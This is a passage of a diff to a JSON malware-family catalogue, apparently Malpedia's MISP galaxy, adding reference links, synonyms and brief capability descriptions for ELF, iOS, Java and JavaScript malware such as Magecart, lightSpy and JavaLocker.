"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html" ], "synonyms": [], "type": [] @@ -1946,6 +4195,21 @@ "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti", + "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d6c5211e-506d-415c-b886-0ced529399a1", + "value": "Winnti (ELF)" + }, { "description": "", "meta": { @@ -1965,11 +4229,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", + "https://unit42.paloaltonetworks.com/a-look-into-fysbis-sofacys-linux-backdoor/", + "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/", + "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" ], "synonyms": [ "chopstick", @@ -1981,6 +4248,19 @@ "uuid": "a8404a31-968a-47e8-8434-533ceaf84c1f", "value": "X-Agent (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe", + "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "55b4d75f-adcc-47df-81cf-6c93ccb54a56", + "value": "Xanthe" + }, { "description": "", "meta": { @@ -2012,11 +4292,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf", + "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/", + "https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", + "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html", "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/", + "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/", "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", - "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" + "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/" + ], + "synonyms": [ + "XORDDOS" ], - "synonyms": [], "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", @@ -2080,6 +4371,38 @@ "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", "value": "GuiInject" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.lightspy", + "https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/", + "https://documents.trendmicro.com/assets/Tech-Brief-Operation-Poisoned-News-Hong-Kong-Users-Targeted-with-Mobile-Malware-via-Local-News-Links.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a1b524b-8fc9-4b1d-805d-c0407aff00d7", + "value": "lightSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.poisoncarp", + "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", + "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + ], + "synonyms": [ + "INSOMNIA" + ], + "type": [] + }, + "uuid": "7982cc15-f884-40ca-8a82-a452b9c340c7", + "value": "PoisonCarp" + }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { @@ -2093,18 +4416,38 @@ "uuid": "bb340271-023c-4283-9d22-123317824a11", "value": "WireLurker (iOS)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.xagent", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "430b9f30-5e37-49c8-b4e7-21589f120d89", + "value": "X-Agent (iOS)" + }, { "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", - "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", + "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", + "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", "http://malware-traffic-analysis.net/2017/07/04/index.html", - "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", - "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.zscaler.com/blogs/research/compromised-wordpress-sites-used-distribute-adwind-rat", + "https://marcoramilli.com/2018/08/20/interesting-hidden-threat-since-years/", + "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/", + "https://citizenlab.ca/2015/12/packrat-report/" ], "synonyms": [ "AlienSpy", @@ -2119,6 +4462,19 @@ "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adzok", + "https://citizenlab.ca/2015/12/packrat-report/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "90cb8ee6-52e6-4d8d-8f45-f04b9aec1f6c", + "value": "Adzok" + }, { "description": "", "meta": { @@ -2134,6 +4490,19 @@ "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043", "value": "Banload" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.bluebanana", + "https://www.virustotal.com/gui/file/60faab36491e07f10bf6a3ebe66ed9238459b2af7e36118fccd50583728141a4/community" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c51bbc9b-0906-4ac5-8026-d6b8b7b23e71", + "value": "Blue Banana RAT" + }, { "description": "", "meta": { @@ -2164,11 +4533,25 @@ "value": "FEimea RAT" }, { - "description": "", + "description": "According to Karsten Hahn, this malware is actually written in JPHP, but can be treated similar to .class files produced by Java. IceRat has been observed to carry out information stealing and mining.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.icerat", + "https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ac83a481-2ab4-42c2-a8b6-a4aec96e1c4b", + "value": "IceRat" + }, + { + "description": "JavaDispCash is a piece of malware designed for ATMs. The compromise happens by using the JVM attach-API on the ATM's local application and the goal is to remotely control its operation. The malware's primary feature is the ability to dispense cash. The malware also spawns a local port (65413) listening for commands from the attacker which needs to be located in the same internal network.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", - "https://twitter.com/r3c0nst/status/1111254169623674882" + "https://twitter.com/r3c0nst/status/1111254169623674882", + "https://github.com/fboldewin/Libertad-y-gloria---A-Mexican-cyber-heist-story---CyberCrimeCon19-Singapore" ], "synonyms": [], "type": [] @@ -2176,15 +4559,32 @@ "uuid": "71286008-9794-4dcc-a571-164195390c39", "value": "JavaDispCash" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javalocker", + "https://dissectingmalwa.re/why-would-you-even-bother-javalocker.html", + "https://id-ransomware.blogspot.com/2020/03/javalocker-ransomware.html" + ], + "synonyms": [ + "JavaEncrypt Ransomware" + ], + "type": [] + }, + "uuid": "4bdddf41-8d5e-468d-905d-8c6667a5d47f", + "value": "JavaLocker" + }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", - "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", + "https://www.eff.org/files/2018/01/29/operation-manul.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", - "https://github.com/java-rat", - "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/" + "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/", + "https://research.checkpoint.com/malware-against-the-c-monoculture/", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" ], "synonyms": [ "Jacksbot" @@ -2207,13 +4607,26 @@ "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", "value": "jSpy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.octopus_scanner", + "http://blog.nsfocus.net/github-ocs-0605/", + "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8ae996fe-50bb-479b-925c-e6b1e51a9b40", + "value": "Octopus Scanner" + }, { "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", - "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/", - "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/" + "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" ], "synonyms": [], "type": [] @@ -2226,9 +4639,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", - "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer" + "https://www.securityinbits.com/malware-analysis/unpacking/unpacking-pyrogenic-qealler-using-java-agent-part-0x2/", + "https://www.securityinbits.com/malware-analysis/pyrogenic-infostealer-static-analysis-part-0x1/", + "https://www.cyberark.com/threat-research-blog/qealler-the-silent-java-credential-thief/", + "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer", + "https://www.securityinbits.com/malware-analysis/similarity-between-qealler-pyrogenic-variants-part-0x3/", + "https://github.com/jeFF0Falltrades/Malware-Writeups/blob/master/Qealler/Qealler-Unloaded.pdf", + "https://www.herbiez.com/?p=1352" + ], + "synonyms": [ + "Pyrogenic Infostealer" ], - "synonyms": [], "type": [] }, "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb", @@ -2240,7 +4661,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", - "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rats-and-spam-the-nodejs-qrat/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/", "https://www.digitrustgroup.com/java-rat-qrat/" ], "synonyms": [ @@ -2256,7 +4678,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", - "https://github.com/shotskeber/Ratty" + "https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/" ], "synonyms": [], "type": [] @@ -2264,6 +4686,19 @@ "uuid": "da032a95-b02a-4af2-b563-69f686653af4", "value": "Ratty" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat", + "https://www.gdatasoftware.com/blog/strrat-crimson" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6d1335d5-8351-4725-ad8a-07cabca4119e", + "value": "STRRAT" + }, { "description": "", "meta": { @@ -2284,7 +4719,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", - "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html", + "http://www.kahusecurity.com/posts/reflow_javascript_backdoor.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" ], "synonyms": [ "Orz" @@ -2299,6 +4736,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], @@ -2308,10 +4747,11 @@ "value": "Bateleur" }, { - "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], @@ -2325,6 +4765,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/", "https://www.codercto.com/a/46729.html", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], @@ -2368,7 +4811,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat", - "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [ "DNSbot" @@ -2378,13 +4822,35 @@ "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e", "value": "DNSRat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.enrume", + "https://blog.emsisoft.com/de/21077/meet-ransom32-the-first-javascript-ransomware/" + ], + "synonyms": [ + "Ransom32" + ], + "type": [] + }, + "uuid": "d6e5f6b7-cafb-476d-958c-72debdabe013", + "value": "Enrume" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", + "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html", + "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", + "http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", - "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [], "type": [] @@ -2392,12 +4858,33 @@ "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3", "value": "EVILNUM (Javascript)" }, + { + "description": "grelos is a skimmer used for magecart-style attacks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.grelos", + "https://gist.github.com/krautface/2c017f220f2a24141bdeb70f76e7e745", + "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://community.riskiq.com/article/8c4b4a7a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "79580c0b-c390-4421-976a-629a5c11af95", + "value": "grelos" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", - "https://twitter.com/ItsReallyNick/status/1059898708286939136" + "https://twitter.com/ItsReallyNick/status/1059898708286939136", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout" ], "synonyms": [], "type": [] @@ -2405,11 +4892,38 @@ "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd", "value": "Griffon" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.inter", + "https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "36b0f1a0-29a4-4ec5-bca2-18a241881d49", + "value": "inter" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.jsprat", + "https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators" + ], + "synonyms": [], + "type": [] + }, + "uuid": "71903afc-7129-4821-90e5-c490e4902de3", + "value": "jspRAT" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" @@ -2422,12 +4936,67 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr", + "https://github.com/Zenexer/lnkr", + "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md", + "https://www.riskiq.com/blog/labs/lnkr-browser-extension/", + "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1a85acf3-4bda-49b4-9e50-1231f0b7340a", + "value": "LNKR" + }, + { + "description": "Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it's a sophisticated implant built on top of relays, command and controls and anonymizers used to steal eCommerce customers' credit card information. The first stage is typically implemented in Javascript included into a compromised checkout page. It copies data from \"input fields\" and send them to a relay which collects credit cards coming from a subset of compromised eCommerces and forwards them to Command and Control servers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://sansec.io/research/magento-2-persistent-parasite", + "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf", + "https://sansec.io/research/north-korea-magecart", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", + "https://www.riskiq.com/blog/labs/magecart-nutribullet/", + "https://community.riskiq.com/article/fda1f967", "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/", + "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", + "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", + "https://www.goggleheadedhacker.com/blog/post/14", + "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", + "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", + "https://community.riskiq.com/article/5bea32aa", + "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", + "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/", + "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", + "https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", + "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", + "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", + "https://community.riskiq.com/article/30f22a00", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://community.riskiq.com/article/14924d61", + "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html", + "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", + "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", + "https://sansec.io/research/magecart-corona-lockdown", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", - "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/", + "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", + "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/" ], "synonyms": [], "type": [] @@ -2440,16 +5009,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", + "https://attack.mitre.org/software/S0284/", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", + "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", 